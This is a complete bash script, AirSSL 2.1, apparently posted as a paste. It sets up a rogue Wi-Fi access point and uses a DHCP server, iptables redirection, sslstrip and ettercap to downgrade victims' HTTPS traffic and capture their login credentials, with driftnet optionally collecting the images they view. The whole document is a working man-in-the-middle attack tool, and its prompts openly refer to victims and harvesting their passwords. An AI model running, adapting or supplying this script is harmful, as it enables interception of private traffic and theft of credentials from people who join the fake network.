AirSSL 2.1 Updated 04/08/2013

1. #!/bin/bash
2. # (C)opyright 2009 - killadaninja - Modified G60Jon 2010
3. # airssl.sh - v2.1
4. # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
5. # http://www.backtrack-linux.org/forums/showthread.php?t=28111
6.  
7.  
8. # Network questions
9. echo
10. echo "AIRSSL 2.1 - Credits killadaninja & G60Jon"
11. echo
12. route -n -A inet | grep UG
13. echo
14. echo
15. echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
16. read -e gatewayip
17. echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
18. read -e internet_interface
19. echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
20. read -e fakeap_interface
21. echo -n "Enter the ESSID you would like your rogue AP to be called: "
22. read -e ESSID
23.  
24. # Fake ap setup
25. echo "[+] Configuring FakeAP...."
26. echo
27. echo "Airbase-ng will run in its most basic mode, would you like to
28. configure any extra switches? "
29. echo
30. echo "Press 'Y' to see airbase-ng help and then add custom switches. "
31. echo "Press 'N' to run airbase-ng in basic mode with your choosen ESSID. "
32. echo "Press 'A' to run airbase-ng in respond to all probes modie. "
33.  
34. read -e ANSWER
35.  
36. airmon-ng start $fakeap_interface
37. fakeap=$fakeap_interface
38. fakeap_interface="mon0"
39.  
40. if [ $ANSWER = "y" ] || [ $ANSWER = "Y" ] ; then
41. airbase-ng --help
42.  
43. echo
44. echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
45. redefined, also in this mode you MUST define a channel "
46. read -e aswitch
47. echo
48. echo "[+] Starting FakeAP..."
49. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
50. sleep 2
51.  
52.  
53. elif [ $ANSWER = "a" ] || [ $ANSWER = "A" ] ; then
54. echo
55. echo "[+] Starting FakeAP..."
56. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
57. sleep 2
58.  
59.  
60. elif [ $ANSWER = "n" ] || [ $ANSWER = "N" ] ; then
61. echo
62. echo "[+] Starting FakeAP..."
63. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
64. sleep 2
65.  
66. else
67. echo "Next Time Choose one of the options!"
68. echo "Exiting without making any system changes!"
69. airmon-ng stop mon0
70. exit
71. fi
72.  
73.  
74. # Dhcpd creation
75. mkdir -p "/usr/share/airssl"
76. echo "authoritative;
77.  
78. default-lease-time 600;
79. max-lease-time 7200;
80.  
81. subnet 10.0.0.0 netmask 255.255.255.0 {
82. option routers 10.0.0.1;
83. option subnet-mask 255.255.255.0;
84.  
85. option domain-name "\"$ESSID\"";
86. option domain-name-servers 10.0.0.1;
87.  
88. range 10.0.0.20 10.0.0.50;
89.  
90. }" > /usr/share/airssl/dhcpd.conf
91.  
92.  
93. # IP Tables
94. echo "[+] Configuring forwarding tables..."
95. ifconfig lo up
96. ifconfig at0 up &
97. sleep 1
98. ifconfig at0 10.0.0.1 netmask 255.255.255.0
99. ifconfig at0 mtu 1400
100. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
101. iptables --flush
102. iptables --table nat --flush
103. iptables --delete-chain
104. iptables --table nat --delete-chain
105. echo 1 > /proc/sys/net/ipv4/ip_forward
106. iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
107. iptables -P FORWARD ACCEPT
108. iptables --append FORWARD --in-interface at0 -j ACCEPT
109. iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
110. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
111.  
112. # DHCP
113. echo "[+] Setting up DHCP..."
114. touch /var/run/dhcpd.pid
115. xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/usr/share/airssl/dhcpd.conf" at0 & dchpid=$!
116. sleep 3
117.  
118. # Sslstrip
119. echo "[+] Starting sslstrip..."
120. xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -k -l 10000 & sslstripid=$!
121. sleep 2
122.  
123. # Ettercap
124. echo "[+] Configuring ettercap..."
125. echo
126. echo "Ettercap will run in its most basic mode, would you like to
127. configure any extra switches for example to load plugins or filters,
128. (advanced users only), if you are unsure choose N "
129. echo "Y or N "
130. read ETTER
131. if [ $ETTER = "y" ] || [ $ETTER = "Y" ] ; then
132. ettercap --help
133.  
134. echo " "
135. echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
136. For the sake of airssl, ettercap WILL USE -u and -p so you are advised
137. NOT to use -M, also -i is already set and CANNOT be redifined here.
138. Ettercaps output will be saved to /pentest/wireless/airssl/passwords
139. DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
140. echo
141. read "eswitch"
142. echo "[+] Starting ettercap..."
143. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
144. sleep 1
145.  
146. else
147.  
148. echo
149. echo "[+] Starting ettercap..."
150. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
151. sleep 1
152. fi
153.  
154. # Driftnet
155. echo
156. echo "[+] Driftnet?"
157. echo
158. echo "Would you also like to start driftnet to capture the victims images,
159. (this may make the network a little slower), "
160. echo "Y or N "
161. read DRIFT
162.  
163. if [ $DRIFT = "y" ] || [ $DRIFT = "Y" ] ; then
164. mkdir -p "/pentest/wireless/airssl/driftnetdata"
165. echo "[+] Starting driftnet..."
166. driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
167. sleep 3
168. fi
169.  
170. xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
171.  
172. clear
173. echo
174. echo "[+] Activated..."
175. echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
176. echo
177. echo "[+] IMPORTANT..."
178. echo "After you have finished please close airssl and clean up properly by pressing any key,
179. if airssl is not closed properly ERRORS WILL OCCUR "
180. echo " "
181. read WISH
182.  
183. # Clean up
184. if [ -n $WISH ] ; then
185. echo
186. echo "[+] Cleaning up airssl and resetting iptables..."
187.  
188. kill ${fakeapid}
189. kill ${dchpid}
190. kill ${sslstripid}
191. kill ${ettercapid}
192. kill ${dritnetid}
193. kill ${sslstriplogid}
194.  
195. airmon-ng stop $fakeap_interface
196. airmon-ng stop $fakeap
197. echo "0" > /proc/sys/net/ipv4/ip_forward
198. iptables --flush
199. iptables --table nat --flush
200. iptables --delete-chain
201. iptables --table nat --delete-chain
202.  
203. echo "[+] Clean up successful..."
204. echo "[+] Thank you for using airssl, Good Bye..."
205. exit
206.  
207. fi
208. exit